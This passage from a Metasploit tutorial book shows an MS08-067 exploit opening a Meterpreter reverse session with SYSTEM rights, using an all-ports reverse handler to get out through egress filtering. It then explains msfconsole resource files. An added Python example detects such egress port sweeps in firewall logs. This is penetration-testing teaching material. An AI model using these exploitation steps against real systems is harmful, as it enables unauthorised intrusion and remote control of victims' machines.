Chapter 5
msf exploit(ms08_067_netapi) >
[*] Started reverse handler on 192.168.33.129:1
[*] Triggering the vulnerability...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (192.168.33.129:1 -> 192.168.33.130:1047)
msf exploit(ms08_067_netapi) > sessions -l -v
Active sessions
===============
  Id  Type         Information                         Connection                                Via
  --  ----         -----------                         ----------                                ---
  1   meterpreter  NT AUTHORITY\SYSTEM @ IHAZSECURITY  192.168.33.129:1 -> 192.168.33.130:1047   exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
Notice that we do not set an LPORT; instead, we use allports because we are going to try to connect out of the network on each port until we find an open one. If you look closely at the output above, you will see that our attacker machine is bound to :1 (all ports) and that it finds a port outbound on port 1047 on the target network.
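
Seen from the defender's side, the behaviour described above (one host trying port after port toward a single outside address until one gets through) shows up in egress firewall logs. The following Python example is added here and is not from the original text; the log format, the thresholds and the sample lines are constructed assumptions.

```python
from collections import Counter, defaultdict

def find_egress_sweeps(lines, window=60, min_ports=20):
    """Return one finding per (src, dst) pair that tried at least `min_ports`
    distinct destination ports on a single remote host within `window` seconds."""
    by_pair = defaultdict(list)
    for line in lines:
        if not line.strip():
            continue
        # Assumed log format: "<epoch> <ALLOW|DENY> <src_ip> <dst_ip> <dst_port>"
        ts, action, src, dst, dport = line.split()
        by_pair[(src, dst)].append((int(ts), action, int(dport)))

    findings = []
    for (src, dst), events in by_pair.items():
        events.sort()
        in_window = Counter()  # destination port -> attempts inside the window
        start = 0
        for ts, action, dport in events:
            in_window[dport] += 1
            # Slide the window forward, forgetting attempts older than `window`.
            while ts - events[start][0] > window:
                old = events[start][2]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                start += 1
            if len(in_window) >= min_ports:
                # First connection the firewall let through after the sweep
                # began: this is the egress port that needs review.
                allowed = next((p for _, a, p in events[start:] if a == "ALLOW"), None)
                findings.append({"src": src, "dst": dst,
                                 "first_seen": events[start][0],
                                 "allowed_port": allowed})
                break
    return findings

# Constructed sample: one host walks ports 1-24 (denied) and gets out on 25;
# a second host makes ordinary web connections.
SAMPLE = [f"{1000 + p} DENY 192.168.33.130 192.168.33.129 {p}" for p in range(1, 25)]
SAMPLE.append("1025 ALLOW 192.168.33.130 192.168.33.129 25")
SAMPLE += ["1001 ALLOW 192.168.33.131 203.0.113.10 443",
           "1030 ALLOW 192.168.33.131 203.0.113.10 80"]

if __name__ == "__main__":
    for finding in find_egress_sweeps(SAMPLE):
        print(finding)
```

The reported allowed_port is the outbound rule to tighten; default-deny egress with an explicit allow list leaves a sweep like this nothing to find.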
Resource Files
Resource files are script files that automate commands within msfconsole. They contain a list of commands that are executed from msfconsole and run sequentially. Resource files can greatly reduce testing and development times, allowing you to automate many repetitive tasks, including exploitation.
Resource files can be loaded from msfconsole with the resource command, or they can be passed as a command-line argument with the -r switch.
The simple example shown next creates a resource file that displays our Metasploit version and then loads the sounds plug-in:
root@bt:/opt/framework3/msf3/ echo version > resource.rc
root@bt:/opt/framework3/msf3/ echo load sounds >> resource.rc
root@bt:/opt/framework3/msf3/ msfconsole -r resource.rc
resource (resource.rc)> version
Framework: 3.7.0-dev.12220
Console : 3.7.0-dev.12220
resource (resource.rc)> load sounds
[*] Successfully loaded plugin: sounds
msf >
As you can see, the version and load sounds commands are echoed into a text file called resource.rc. This file is then passed to msfconsole at the command line with the -r switch, and when the file begins to load, the commands are executed from the resource file.